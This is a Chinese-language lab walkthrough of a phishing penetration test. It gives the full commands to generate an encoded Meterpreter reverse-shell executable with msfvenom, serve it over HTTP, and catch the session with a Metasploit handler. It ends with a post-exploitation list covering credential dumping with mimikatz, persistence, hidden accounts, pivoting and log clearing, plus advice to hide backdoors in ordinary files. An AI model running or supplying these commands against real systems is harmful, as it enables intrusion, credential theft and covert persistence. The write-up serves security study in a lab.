钓鱼渗透测试实验复现
用途:网络安全学习分享,仅限授权环境测试
一、实验环境
角色 | 系统/工具 | IP地址 |
攻击机 | Windows 11(矛盾武器库) | 10.0.0.166 |
靶机 | Windows 10 x64 | 10.0.0.153 |
攻击机:Windows 11 Penetration Suite Toolkit - VMware Workstation
矛盾武器库,可以去下载
靶机:普通win10 X64
二、实验原理
本次实验采用「后门植入 + 反向连接」的经典渗透链路:
- MSFvenom生成带有反向 Shell 的 Payload(可执行文件)。
- 攻击机开启 HTTP 服务,供靶机下载 Payload。
- MSFconsole Handler在攻击机监听指定端口,等待靶机上线。
- 靶机执行 Payload后,Meterpreter 会话建立,进入后渗透阶段。
三、实验步骤
关闭靶机防火墙
互相ping网段测试链接
靶机ping攻击机
攻击机ping靶机
生成payload
攻击机使用MSF,矛盾武器库自带,无需额外下载
分为MSFvenom和MSFconsole
msfvenom = 生成 payload
msfconsole = 多模块,后续操作
先用msfvenom生成payload在桌面
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.166 LPORT=4444 -e x64/xor_dynamic -i 5 -f exe -o C:\Users\Administrator\Desktop\shell.exe
然后新开一个窗口,打开攻击机的8080端口,让靶机能够正常访问
netsh advfirewall firewall add rule name="HTTP_8080" dir=in action=allow protocol=tcp localport=8080
还有4444端口,后面也会用到
netsh advfirewall firewall add rule name="MSF_4444" dir=in action=allow protocol=tcp localport=4444
在桌面开启http服务
python3 -m http.server 8080
打开MSFconsole命令行输入banner,查看信息和各模块数量
exploit:漏洞攻击/利用模块
auxiliary:辅助模块,信息收集、扫描、嗅探、指纹识别、口令猜解
post:后渗透模块,获取目标系统的控制权以后,进行的一系列攻击动作,比如获取敏感信息、跳板攻击等
paylods:攻击代码或指令
encoders:加密模块,对payload进行加密,躲避杀毒软件的查杀
nops:提高和维持payload稳定性
evasion:高级免杀
使用模块
use exploit/multi/handler
输入show options查看信息,以下是配置信息
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.0.0.166
set LPORT 4444
run
正在监听,然后我们切换到靶机来访问攻击机地址并下载shell.exe
会被实时监测查杀,我们做实验环境,简单教学为主,关闭实时保护
现在下载下来执行文件
返回攻击机,可以发现已经成功连接靶机
然后进输入shell,可以运用靶机的shell窗口,输入whoami,发现我们是管理员账户,实验环境,靶机登陆的就是管理员
现在截张靶机图片
成功拿下,关闭攻击机实验开放窗口
netsh advfirewall firewall delete rule name="HTTP_8080"
netsh advfirewall firewall delete rule name="MSF_4444"
结尾:正常渗透后应该是普通用户,先进行信息搜集,再提升权限,凭证获取,权限维持,横向移动,做完清理痕迹,不做演示。
- 信息搜集:sysinfo、getuid、ps、ipconfig、route
- 权限提升:getsystem、local_exploit_suggester
- 凭证获取:hashdump、kiwi/mimikatz(明文密码)
- 权限维持:persistence、注册表后门、添加隐藏用户
- 横向移动:route add + socks_proxy 跳板进内网
- 痕迹清理:clearev、删除后门账户与文件
万变不离其宗,钓鱼的办法就是伪装正常文件或在正常文件添加后门让对方下载使用,方法多样,自行发挥。
以上仅作学习分享。